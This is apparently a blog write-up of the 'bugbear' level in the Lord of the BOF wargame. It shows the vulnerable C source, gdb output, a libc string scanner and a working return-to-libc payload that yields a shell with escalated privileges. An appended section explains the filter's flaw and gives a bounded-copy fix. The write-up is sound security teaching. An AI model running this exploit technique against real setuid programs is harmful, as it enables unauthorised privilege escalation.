  • [lob] darkknight -> bugbear
    Study/LOB 2014. 7. 30. 20:06

    [darkknight@localhost darkknight]$ cat bugbear.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - bugbear
            - RTL1
    */

    #include <stdio.h>
    #include <stdlib.h>

    main(int argc, char *argv[])
    {
        char buffer[40];
        int i;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
            printf("stack betrayed you!!\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }

    (gdb) b main
    Breakpoint 1 at 0x8048436
    (gdb) r
    Starting program: /home/darkknight/bb

    Breakpoint 1, 0x8048436 in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb)

    [darkknight@localhost darkknight]$ cat find.c
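    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        long shell;
        shell = 0x40058ae0;   /* address of system() reported by gdb above */
        /* walk forward through libc until the bytes "/bin/sh\0" are found */
        while (memcmp((void *)shell, "/bin/sh", 8)) shell++;
        printf("/bin/sh = %p\n", (void *)shell);
        return 0;
    }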
    [darkknight@localhost darkknight]$ ./find
    /bin/sh = 0x400fbff9

    payload = 44 bytes of dummy + address of system + 4 bytes of dummy + address of /bin/sh

    [darkknight@localhost darkknight]$ ./bugbear `python -c 'print "a"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?@BBBB廈@
    bash$ Xshell
    sh: Xshell: command not found
    bash$ id
    uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
    bash$ my-pass
    euid = 513
    new divide
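
Added example, not part of the original post or the wargame's code: the check on `argv[1][47]` only rejects a return address whose top byte is `0xbf`, so a library-range `0x40...` value like the one gdb printed passes it, and the actual fix is a bounded copy rather than a filter. The names `passes_stack_filter`, `copy_checked` and `make_sample` are hypothetical, and the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* size of buffer[] in bugbear.c */
#define RET_TOP  47   /* index bugbear.c inspects: top byte of the saved return address */

/* Hypothetical helper: the challenge's blocklist, with the length checked
 * first so a short argument is never indexed out of bounds.
 * Returns 1 if the original check would accept the argument. */
int passes_stack_filter(const char *arg)
{
    size_t len = strlen(arg);
    if (len > RET_TOP && (unsigned char)arg[RET_TOP] == 0xbf)
        return 0;
    return 1;
}

/* Hypothetical bounded replacement for strcpy(buffer, argv[1]): refuses
 * input that does not fit instead of truncating it silently.
 * Returns 0 on success, -1 if src plus its NUL is larger than dst. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (dstsz == 0 || len >= dstsz)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed sample with the same shape as the payload line above:
 * 44 filler bytes, a 4-byte little-endian value whose top byte is 0x40,
 * then 8 more filler bytes. The low bytes are placeholders, not addresses. */
void make_sample(char out[57])
{
    memset(out, 'a', 56);
    out[44] = 0x01; out[45] = 0x01; out[46] = 0x01; out[47] = 0x40;
    out[56] = '\0';
}

int main(void)
{
    char buffer[BUF_SIZE], sample[57];
    make_sample(sample);
    printf("filter accepts: %d\n", passes_stack_filter(sample));
    printf("bounded copy:   %d\n", copy_checked(buffer, sizeof buffer, sample));
    printf("short input:    %d\n", copy_checked(buffer, sizeof buffer, "hello"));
    return 0;
}
```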
